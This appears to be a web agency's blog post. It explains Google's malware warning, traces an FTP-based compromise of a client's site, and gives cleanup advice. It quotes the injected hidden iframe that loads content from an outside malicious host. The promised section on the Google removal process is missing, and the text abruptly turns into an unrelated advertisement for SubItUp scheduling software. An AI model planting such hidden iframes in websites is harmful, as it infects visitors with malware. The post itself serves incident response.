Google has introduced a new piece of logic into their indexing engine, which detects malware embedded within websites.  If your website has been compromised, which I’ll explain what ‘compromised’ means later, then you will see “This site may harm your computer” when you search Google for your website.

Within this article we will discuss

1. What does it mean to have a compromised website
2. How does a compromise occur
3. How to resolve this issue
4. How to I work with Google to remove the “This site may harm your computer” link

What does it mean to have a compromised website?

Recently we had a client call us with this concern.  Several of his clients contacted him and said that when they searched for his website on Google, they were presented with a link under the title of the result page that said “This site may harm your computer”.  The result looked just like this:

How did this happen?

In this case, it is easy to look at the result of the attack and work backward toward how the attack occurred.  Here is what we know;

1. The attacker placed the following line of code on a website file:

   <iframe src="http://filmlifeimages.cn:8080/index.php"

   width=180 height=111 style="visibility: hidden"></iframe>

2. After consulting with the client, who had FTP access, we knew that he was not responsible for uploading a file containing this information
3. We noted the date of the modified file on the file system 6/10/2009 @  2:08am CST
4. We then looked at the FTP log files to understand what happened on the 10th at 2:08am.
5. The log file outlined that every page on the site was overwritten, status 226, on or around 2:08am
6. The account used to access the server was a valid FTP account.

How do I resolve this issue?
If you are the hosting company – you should know what to do.  Reset the FTP account password, remove ‘any’ access to port 21 on your firewall and begin restricting access by IP or VPN.

If you are the client – your computer, and potentially your network is infected with a keylogger program.  Our suggestion is that you complete the following steps immediately.

1. If you do online banking, call your bank immediately to have your account credentials changed
2. If you have purchased anything online recently, call your credit card companies and have them reissue you a new card.
3. If you have provided any websites significant information about your identity, contact an identity theft company

Once you have completed the steps above, you now have to remove the keylogger program from your system.  We recommend using AVAST, found at http://www.avast.com/, there are several types of software like this out on the internet.  Run a full scan of your system and remove all of the infected files.  Moving forward, you should run these types of programs constantly and conduct full system/network scan on a routine basis.

How to I work with Google to remove the “This site may harm your computer” link

Do you have part-time or hourly employees? Tired of managing their schedules? SubItUp is a great tool to assist you, and at very low cost!

Brattle is thrilled to announce the launch of SubItUp.com! This is a new way to manage a company’s schedule changes with absolute ease. SubItUp allows employees to join the company and department for which they work, upload their schedule to the site, and then begin to pick-up more shifts, offer ones they need covered, and switch shifts! This is a great new way to keep all the employees, managers, and owners of a business in the loop in regards to schedule changes. The site offers moderator abilities for owners and managers, or employees may use the site as a self-organized tool to arrange shift changes amongst themselves.

SubItUp and all of its utilities and applications were entirely developed by our talented Brattle team.  The site is currently being tested by MIT, but it is also open for use by the companies country-wide. SubItUp is free to use for employees, and for owners and managers to open up the business/moderator end of the site it is only $15/month.

SubItUp is the first site of its kind to incorporate three kinds of schedule changes plus the ability for managers and owners to oversee all of these changes. We are very proud of SubItUp and we encourage you to visit the site and see for yourself why we think it is going to be a breakthrough for businesses everywhere that schedule employees by the hour. No more last minute phone calls by employees to every person in the business that could pick up their shift, no more frustrated managers when no one shows up for a shift, etc. SubItUp provides a convenient, single location and mechanism to organize and manage your business’ work schedule.

Visit SubItUp.com or call us here at Brattle with any questions about how SubItUp can improve your business!